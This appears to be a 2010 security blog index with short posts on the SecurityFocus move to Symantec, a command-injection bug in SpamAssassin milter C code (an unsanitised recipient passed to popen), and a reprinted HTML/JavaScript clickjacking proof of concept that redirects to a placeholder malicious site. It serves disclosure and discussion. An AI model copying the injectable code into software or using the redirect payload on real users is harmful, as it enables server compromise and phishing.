Securityfocus : Change in Focus

Posted: March 11th, 2010 | Author: | Filed under: IT Related | Tags: , | 1 Comment »

Beginning March 15, 2010 SecurityFocus will begin a transition of its content to Symantec Connect. As part of its continued commitment to the community, all of SecurityFocus’ mailing lists including Bugtraq and its Vulnerability Database will remain online at www.securityfocus.com There will not be any changes to any of the list charters or policies and the same teams who have moderated list traffic will continue to do so. The vulnerability database will continue to be updated and made available as it is currently. DeepSight and other security intelligence related offerings will remain unchanged while Infocus articles, whitepapers, and other SecurityFocus content will be available off of the main Symantec website in the coming months.

Read more HERE


SpamAssassin Milter Plugin ‘mlfi_envrcpt()’ Remote Arbitrary Command Injection Vulnerability

Posted: March 9th, 2010 | Author: | Filed under: IT Related | Tags: , , , | No Comments »

Can you spot the security bug? 🙂

mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
  struct context *sctx = (struct context*)smfi_getpriv(ctx);
  SpamAssassin* assassin = sctx->assassin;
  FILE *p;
#if defined(__FreeBSD__)
  int rv;
#endif
 
  debug(D_FUNC, "mlfi_envrcpt: enter");
 
  if (flag_expand)
  {
  /* open a pipe to sendmail so we can do addressexpansion */
 
    char buf[1024];
    char *fmt="%s -bv \"%s\" 2>&1";
 
#if defined(HAVE_SNPRINTF)
    snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
    sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif
 
    debug(D_RCPT, "calling %s", buf);
 
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
    rv = pthread_mutex_lock(&popen_mutex);
    if (rv)
    {
      debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
      abort();
    }
#endif
 
    p = popen(buf, "r");
    if (!p)
    {
      debug(D_RCPT, "popen failed(%s).  Will not expand aliases", strerror(errno));
      assassin->expandedrcpt.push_back(envrcpt[0]);

Phishing or Clickjacking?

Posted: February 26th, 2010 | Author: | Filed under: IT Related | Tags: , , , | 2 Comments »

I was about to shutdown my machine and go to sleep but suddenly my RSS reader popping up new feeds.

Here is one thing that made me smile:

Mozilla firefox 3.6 unpatched phishing vulnerability

From: bugsbanned () hushmail com
Date: Wed, 24 Feb 2010 19:29:33 -0300

…Unpatched bug since Mozilla firefox 3.0…

Mozilla “INsecurity team” remember, security through obscurity just
DOESN’T WORK…
Locking down bugzilla advisories even the 2 years old ones is
unnecessary and lame.

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://Maliciouswebsite’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://trustedwebsite”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-size:32px”>http://trusted
website</font></a><br>

</div>
</body>
</html>

For example:

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://www.wikipedia.org’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://www.google.com”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-
size:32px”>http://www.google.com</font></a><br>

</div>
</body>
</html>

Source:www exploit-db com

Phishing huh? To me its clickjacking 🙂

Source: http://seclists.org/fulldisclosure/2010/Feb/434

P/S: Owh ya, NoScript is one of my best friend and he wants to be your best friend to 😉


Mangsa :: salawank

Posted: February 25th, 2010 | Author: | Filed under: Wall of shame | Tags: , , , | 3 Comments »
<xanda> salawank: livescore2facebook aku dah cun.. nanti aku release source code.. 
<xanda> salawank: world cup nie.. mesti dapat sambutan nie
<salawank> xanda: nice.. aku usya, nak2 time dia inform chelase kalah
<salawank> hoho
<salawank> xanda: code dlm ruby ke?
<xanda> salawank: asal nye aku code ruby
<xanda> salawank: last last...
<salawank> php
<xanda> salawank: tak.. ruby la.. buat apa nak tuka2?
<salawank> siot
<xanda> HAHAHAHA

XandaForceHTTPS Updated

Posted: February 25th, 2010 | Author: | Filed under: IT Related | Tags: , , , | No Comments »

XandaForceHTTPS updated. Now with Firefox 3.6.* support. Requested by LinuxMalaysia

Read more HERE